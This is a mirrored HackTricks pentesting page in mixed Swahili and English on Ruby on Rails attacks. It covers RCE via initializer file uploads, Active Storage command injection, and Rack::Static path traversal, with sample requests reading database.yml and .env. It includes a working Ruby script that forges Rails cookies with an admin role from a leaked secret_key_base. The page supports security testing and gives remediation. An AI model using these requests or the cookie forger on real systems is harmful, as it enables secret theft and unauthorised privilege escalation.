maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/pentesting-web/ruby-tricks.md

101 lines
5.5 KiB
Markdown
Raw Blame History

# Mbinu za Ruby
{{#include ../../banners/hacktricks-training.md}}
## Kupakia faili kwa RCE
As explained in [this article](https://www.offsec.com/blog/cve-2024-46986/), uploading a `.rb` file into sensitive directories such as `config/initializers/` can lead to remote code execution (RCE) in Ruby on Rails applications.
Vidokezo:
- Mahali mengine ya boot/eager-load yanayotekelezwa wakati app inapoanza pia ni hatari endapo yanaweza kuandikwa (kwa mfano, `config/initializers/` ni mfano wa kawaida). Ikiwa utapata upload ya faili yoyote inayowekwa mahali popote chini ya `config/` na baadaye ikafanyiwa evaluate/required, unaweza kupata RCE wakati wa boot.
- Tafuta dev/staging builds zinazokopi faili zinazoendeshwa na mtumiaji ndani ya container image ambako Rails itazi-load wakati wa boot.
## Active Storage image transformation → command execution (CVE-2025-24293)
When an application uses Active Storage with `image_processing` + `mini_magick`, and passes untrusted parameters to image transformation methods, Rails versions prior to 7.1.5.2 / 7.2.2.2 / 8.0.2.1 could allow command injection because some transformation methods were mistakenly allowed by default.
- A vulnerable pattern looks like:
```erb
<%= image_tag blob.variant(params[:t] => params[:v]) %>
```
where `params[:t]` and/or `params[:v]` are attacker-controlled.
- What to try during testing
- Tambua endpoints yoyote inayokubali variant/processing options, transformation names, au ImageMagick arguments yoyote.
- Fuzz `params[:t]` na `params[:v]` kwa makosa au athari za utekelezaji zinazoshangaza. Ikiwa unaweza kuathiri jina la method au kupitisha raw arguments zinazofika MiniMagick, unaweza kupata code exec kwenye host ya image processor.
- Ikiwa una read-access pekee kwa variants zilizozalishwa, jaribu blind exfiltration kupitia ImageMagick operations zilizotengenezwa maalum.
- Remediation/detections
- Ikiwa unaona Rails < 7.1.5.2 / 7.2.2.2 / 8.0.2.1 pamoja na Active Storage + `image_processing` + `mini_magick` na transformations zinazoendeshwa na mtumiaji, zingatia kuwa zinatumiwa. Pendekeza upgrade na kutekeleza allowlists kali kwa methods/params pamoja na sera ya ImageMagick iliyoboreshwa.
## Rack::Static LFI / path traversal (CVE-2025-27610)
If the target stack uses Rack middleware directly or via frameworks, versions of `rack` prior to 2.2.13, 3.0.14, and 3.1.12 allow Local File Inclusion via `Rack::Static` when `:root` is unset/misconfigured. Encoded traversal in `PATH_INFO` can expose files under the process working directory or an unexpected root.
- Tafuta apps zinazoweka `Rack::Static` ndani ya `config.ru` au kwenye middleware stacks. Jaribu encoded traversals dhidi ya static paths, kwa mfano:
```text
GET /assets/%2e%2e/%2e%2e/config/database.yml
GET /favicon.ico/..%2f..%2f.env
```
Rekebisha prefix ili iendane na `urls:` iliyosanidiwa. Ikiwa app inajibu na yaliyomo ya faili, inawezekana una LFI kwa chochote chini ya `:root` iliyotatuliwa.
- Mitigation: upgrade Rack; hakikisha `:root` inaonyesha tu kwenye saraka ya faili za umma na imewekwa wazi.
## Forging/decrypting Rails cookies when `secret_key_base` is leaked
Rails encrypts and signs cookies using keys derived from `secret_key_base`. If that value leaks (e.g., in a repo, logs, or misconfigured credentials), you can usually decrypt, modify, and re-encrypt cookies. This often leads to authz bypass if the app stores roles, user IDs, or feature flags in cookies.
Minimal Ruby to decrypt and re-encrypt modern cookies (AES-256-GCM, default in recent Rails):
```ruby
require 'cgi'
require 'json'
require 'active_support'
require 'active_support/message_encryptor'
require 'active_support/key_generator'
secret_key_base = ENV.fetch('SECRET_KEY_BASE_LEAKED')
raw_cookie = CGI.unescape(ARGV[0])
salt = 'authenticated encrypted cookie'
cipher = 'aes-256-gcm'
key_len = ActiveSupport::MessageEncryptor.key_len(cipher)
secret = ActiveSupport::KeyGenerator.new(secret_key_base, iterations: 1000).generate_key(salt, key_len)
enc = ActiveSupport::MessageEncryptor.new(secret, cipher: cipher, serializer: JSON)
plain = enc.decrypt_and_verify(raw_cookie)
puts "Decrypted: #{plain.inspect}"
# Modify and re-encrypt (example: escalate role)
plain['role'] = 'admin' if plain.is_a?(Hash)
forged = enc.encrypt_and_sign(plain)
puts "Forged cookie: #{CGI.escape(forged)}"
```
Vidokezo:
- Programu za zamani zinaweza kutumia AES-256-CBC na salts `encrypted cookie` / `signed encrypted cookie`, au JSON/Marshal serializers. Rekebisha salts, cipher, na serializer ipasavyo.
- Iwapo kutatokea kompromisi au wakati wa tathmini, badilisha `secret_key_base` ili kuondoa uhalali wa cookies zote zilizopo.
## Tazama pia (Ruby/Rails-specific vulns)
- Ruby deserialization and class pollution:
{{#ref}}
../../pentesting-web/deserialization/README.md
{{#endref}}
{{#ref}}
../../pentesting-web/deserialization/ruby-class-pollution.md
{{#endref}}
{{#ref}}
../../pentesting-web/deserialization/ruby-_json-pollution.md
{{#endref}}
- Template injection in Ruby engines (ERB/Haml/Slim, etc.):
{{#ref}}
../../pentesting-web/ssti-server-side-template-injection/README.md
{{#endref}}
## Marejeo
- Rails Security Announcement: CVE-2025-24293 Active Storage unsafe transformation methods (fixed in 7.1.5.2 / 7.2.2.2 / 8.0.2.1). https://discuss.rubyonrails.org/t/cve-2025-24293-active-storage-allowed-transformation-methods-potentially-unsafe/89670
- Ushauri wa GitHub: Rack::Static Local File Inclusion (CVE-2025-27610). https://github.com/advisories/GHSA-7wqh-767x-r66v
{{#include ../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink